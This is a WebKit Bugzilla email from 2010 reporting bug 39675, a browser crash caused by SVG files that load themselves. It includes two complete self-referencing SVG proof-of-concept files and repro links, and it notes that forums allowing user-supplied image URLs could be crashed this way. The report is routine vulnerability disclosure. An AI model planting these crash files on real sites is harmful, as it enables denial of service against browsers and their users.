[Webkit-unassigned] [Bug 39675] New: SVG recursion stack exhaustion crashes.
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Tue May 25 08:22:37 PDT 2010
https://bugs.webkit.org/show_bug.cgi?id=39675
Summary: SVG recursion stack exhaustion crashes.
Product: WebKit
Version: 528+ (Nightly build)
Platform: PC
OS/Version: Windows Vista
Status: NEW
Severity: Normal
Priority: P1
Component: SVG
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: skylined at chromium.org
CC: eric at webkit.org
Having an SVG image load itself through an svg "image" tag or an html "img" tag using foreignObject causes infinite recursion, which crashes the browser. I'm creating one bug for both because they are essentially caused by the same problem. Feel free to split them if you think that works better.
-- html "img" tag --
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" width="1063" height="638">
<foreignObject>
<body xmlns="http://www.w3.org/1999/xhtml">
<img src="[url to this .svg file]" />
</body>
</foreignObject>
</svg>
Chromium bug: http://code.google.com/p/chromium/issues/detail?id=44995
Repro: http://skypher.com/SkyLined/Repro/Chrome/44995%20-%20WebCore..FrameView..paintContents%20RecursionSOV%20(1b0fa0eb19ffe8d1d29dd7a361a99ee0)/repro.svg
-- svg "image" tag --
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" width="1063" height="638">
<image x="0" y="0" width="1063" height="638" xlink:href="[url to this .svg file]" />
</svg>
Chromium bug: http://code.google.com/p/chromium/issues/detail?id=44998
Repro: http://skypher.com/SkyLined/Repro/Chrome/44998%20-%20WebCore..CachedImage..changedInRect%20RecursionSOV%20(512de755335cb1ab73932c04c63216ba)/repro.svg
Marking as security: Because many chat/forum websites allow users to insert images with arbitrary URLs, these crashes can be used as a DoS against these websites.
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
More information about the webkit-unassigned
mailing list